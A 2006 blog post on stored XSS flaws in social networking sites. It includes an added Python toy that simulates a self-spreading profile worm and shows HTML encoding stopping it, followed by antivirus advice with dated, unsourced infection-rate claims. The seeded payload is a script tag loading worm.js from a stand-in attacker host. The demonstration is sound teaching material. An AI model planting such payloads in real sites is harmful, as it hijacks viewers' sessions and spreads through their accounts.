Wednesday, August 2, 2006

Social networking sites have (gasp!) open XSS vulnerabilities

Researchers at a well-known anti-malware company checked out a few popular social networking sites to see how vulnerable they were. In 30 minutes they discovered more than half a dozen server-side, "wormable" Cross-Site Scripting (XSS) vulnerabilities: user-supplied content (a profile field, a comment) is stored by the site and later emitted into other users' pages without being encoded, so script planted by one member runs in the browser of every member who views the page, with that viewer's logged-in session, and can re-post itself into the viewer's own profile.
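To make the "wormable" part concrete, here is an added toy model (not code from the original post and not from the researchers' findings): a profile page built by string concatenation with no output encoding, the same page with HTML-entity encoding, and a simulated viewing sequence in which a stored `<script>` that the "browser" executes copies itself into the viewer's profile. The user names, the `attacker.example` host and the in-memory `ProfileSite` store are all invented for the example.

```python
import html
import re

# Constructed payload for the example: a stored <script> pointing at an
# attacker-controlled host (hypothetical hostname).
WORM_PAYLOAD = '<script src="http://attacker.example/worm.js"></script>'

# Matches a complete <script ...>...</script> element anywhere in a page.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def render_vulnerable(user, bio):
    """Profile page built by concatenation; the stored bio is emitted as live HTML."""
    return f'<h1>{user}</h1><div class="bio">{bio}</div>'


def render_hardened(user, bio):
    """Same page, but every untrusted value is HTML-entity-encoded for element content.
    A stored <script> becomes the literal text &lt;script&gt; and never executes."""
    return (f'<h1>{html.escape(user, quote=True)}</h1>'
            f'<div class="bio">{html.escape(bio, quote=True)}</div>')


class ProfileSite:
    """Minimal stand-in for a social networking site: a server-side store of
    profile bios plus a render function chosen by the caller."""

    def __init__(self, render):
        self.render = render
        self.profiles = {}  # user -> stored bio text

    def save_bio(self, user, bio):
        self.profiles[user] = bio

    def view(self, viewer, target):
        """`viewer` loads `target`'s profile. If the rendered page contains a live
        <script> element, the simulated browser runs it with the viewer's session;
        this toy payload's only action is to store itself in the viewer's own bio,
        which is the self-propagation step of a stored-XSS worm."""
        page = self.render(target, self.profiles.get(target, ""))
        match = SCRIPT_TAG.search(page)
        if match:
            self.profiles[viewer] = match.group(0)
        return page

    def infected_count(self):
        return sum(1 for bio in self.profiles.values() if SCRIPT_TAG.search(bio))


def simulate_outbreak(render):
    """Seed one malicious profile, have three members browse in a chain, and
    return how many stored profiles end up carrying the payload."""
    site = ProfileSite(render)
    site.save_bio("mallory", WORM_PAYLOAD)
    for user in ("alice", "bob", "carol"):
        site.save_bio(user, f"I am {user} & I like <3 music")
    site.view("alice", "mallory")  # alice views the seeded profile
    site.view("bob", "alice")      # bob views alice; spreads only if alice got infected
    site.view("carol", "bob")
    return site.infected_count()


if __name__ == "__main__":
    print("vulnerable render, infected profiles:", simulate_outbreak(render_vulnerable))
    print("hardened render, infected profiles:  ", simulate_outbreak(render_hardened))
```

With the unencoded render the payload spreads to all four profiles; with the encoded render only the attacker's own stored bio contains it, because every viewer receives it as inert text. Two caveats a practitioner would add: `html.escape` is the right encoding only for HTML element content and quoted attribute values, so a value inserted into a JavaScript string, a URL or an event handler needs the encoding for that context instead; and encoding on output is the fix, not input filtering, since the regex used here to detect a live script is deliberately simple and real payloads evade such filters.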

What can end users do?

1) Patch your operating systems! Windows users should be aware that Microsoft generally releases critical updates on the second Tuesday of each month ("Patch Tuesday"). Setting Automatic Updates to download and install on a fixed day once per week (the longest interval you can select in the UI) is a great idea. I recommend selecting Wednesday early in the morning, before your work day starts, and leaving your machine on Tuesday night so the scheduled install can run.

2) Subscribe to good anti-virus protection

3) Subscribe to Malware/Spyware/Adware protection

Anti-virus products that tested well in recent reviews:

- eTrust 8.1 Corporate (Not the home or personal version.)

- Kaspersky

- NOD32

- F-Secure

Some not-so-good choices:

Symantec AV (over 30% tested infection rate with current signatures)

McAfee AV (over 33% infection rates, plus exploitable holes in their update service.)

While the two products above hold the largest market share, they offer abysmal protection. They are also system resource pigs. I tell friends that ask me which engine to choose that these two products will turn a perfectly good Pentium IV machine into a PII . . .

Malware real-time protection (best products, in order of effectiveness):

- Sunbelt Software's CounterSpy (cousin of Windows AntiSpyware Beta 1 and distant relative of Microsoft Defender Beta, but much better!)

- Webroot Spy Sweeper

Malware scanners (on-demand):

- Spybot Search & Destroy

- Lavasoft Ad-Aware Personal
